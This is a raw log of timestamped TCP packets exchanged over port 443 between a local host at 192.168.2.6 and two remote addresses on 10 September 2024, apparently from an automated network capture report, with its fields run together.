                                                                                Sep 10, 2024 16:33:41.755266905 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.755266905 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.755279064 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.755323887 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.755731106 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.755779982 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.755840063 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.755840063 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.755846977 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.756412983 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.756717920 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.756759882 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.756822109 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.756822109 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.756828070 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.756947041 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.757492065 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.757534027 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.757584095 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.757591009 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.757603884 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.757745981 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.759079933 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.759121895 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.759191036 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.759191036 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.759196997 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.759295940 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.790910006 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.790982962 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.791078091 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.791078091 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.791095972 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.791402102 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.839544058 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.839612007 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.839653015 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.839672089 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.839680910 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.839778900 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.839831114 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.839895964 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.839895964 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.839904070 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.840574026 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.841034889 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.841077089 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.841137886 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.841137886 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.841145039 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.841355085 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.841382027 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.841434956 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.841463089 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.841471910 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.841490984 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.841634989 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.842571974 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.842590094 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.842672110 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.842679977 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.842865944 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.843127012 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.843175888 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.843231916 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.843231916 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.843238115 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.843302965 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.844652891 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.844695091 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.844754934 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.844754934 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.844762087 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.844997883 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.879327059 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.879412889 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.879420996 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.879452944 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.879491091 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.879508972 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.937475920 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.937550068 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.937675953 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.937675953 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.937695026 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.937720060 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.937769890 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.937797070 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.937809944 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.937851906 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.937871933 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.938157082 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.938204050 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.938237906 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.938246012 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.938263893 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.938291073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.938735008 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.938782930 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.938843966 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.938843966 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.938853025 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.939059019 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.940954924 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.941003084 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.941039085 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.941051006 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.941068888 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.941092968 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.941406965 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.941448927 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.941481113 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.941492081 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.941514015 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.941571951 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.941999912 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.942050934 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.942076921 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.942085981 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.942111015 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.942183971 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.943372011 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.965379000 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.965421915 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.965487003 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.965504885 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.965523958 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.965621948 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.023732901 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.023789883 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.023849010 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.023865938 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.023896933 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.023942947 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.024099112 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.024147987 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.024166107 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.024175882 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.024214983 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.024214983 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.024544954 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.024588108 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.024611950 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.024622917 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.024651051 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.024718046 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.025049925 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.025091887 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.025124073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.025132895 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.025154114 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.025193930 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.028954029 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.029000998 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.029062986 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.029076099 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.029090881 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.029179096 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.029787064 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.029830933 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.029880047 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.029886007 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.029913902 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.029974937 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.029985905 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.030016899 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.030055046 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.030066013 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.030077934 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.030088902 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.030117035 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.030181885 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.054522038 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.054563046 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.054595947 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.054608107 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.054645061 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.054789066 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.109960079 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110030890 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110074043 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110096931 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110141039 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110244036 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110248089 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110277891 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110315084 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110317945 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110344887 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110363007 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110418081 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110443115 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110729933 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110771894 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110829115 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110836029 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110843897 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110908031 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.111254930 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.111294985 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.111372948 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.111373901 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.111388922 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.111458063 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.113394022 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.113444090 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.113519907 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.113519907 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.113528013 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.113650084 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.113908052 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.113955021 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.113974094 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.113982916 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.114031076 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.114507914 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.114557981 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.114605904 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.114613056 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.114649057 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.114676952 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.115628958 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.138477087 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.138504982 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.138560057 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.138569117 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.138657093 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.196086884 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.196147919 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.196208000 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.196216106 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.196285963 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.196285963 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.196497917 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.196543932 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.196573019 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.196588993 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.196641922 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.196712971 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.196959972 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.197011948 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.197041988 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.197057009 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.197114944 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.197114944 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.197325945 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.197367907 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.197448969 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.197448969 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.197458029 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.197583914 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.199549913 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.199594021 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.199620008 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.199635983 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.199682951 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.199899912 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.200258017 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.200305939 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.200357914 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.200366020 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.200421095 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.200421095 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.200788975 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.200831890 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.200864077 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.200879097 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.200964928 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.201025963 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.225086927 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.225117922 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.225341082 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.225364923 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.225635052 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.282274008 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.282339096 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.282390118 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.282409906 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.282460928 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.282738924 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.283149958 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.283191919 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.283246994 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.283255100 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.283288956 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.283390045 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.283646107 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.283691883 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.283715010 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.283721924 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.283782959 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.284107924 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.284157038 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.284236908 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.284236908 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.284245968 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.284373045 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.284591913 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.284701109 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.295283079 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.295283079 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.295315027 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.295325041 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:47.107718945 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.107764959 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.107851982 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.116463900 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.116475105 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.624710083 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.624783039 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.626399040 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.626411915 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.626615047 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.632911921 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.675422907 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.771734953 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.771755934 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.771919966 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.771945953 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.835648060 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.861128092 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.861136913 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.861176968 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.861188889 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.861203909 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.861217976 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.861252069 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.861268044 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.863241911 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.863256931 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.863307953 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.863317013 CEST4434973379.141.161.172192.168.2.6
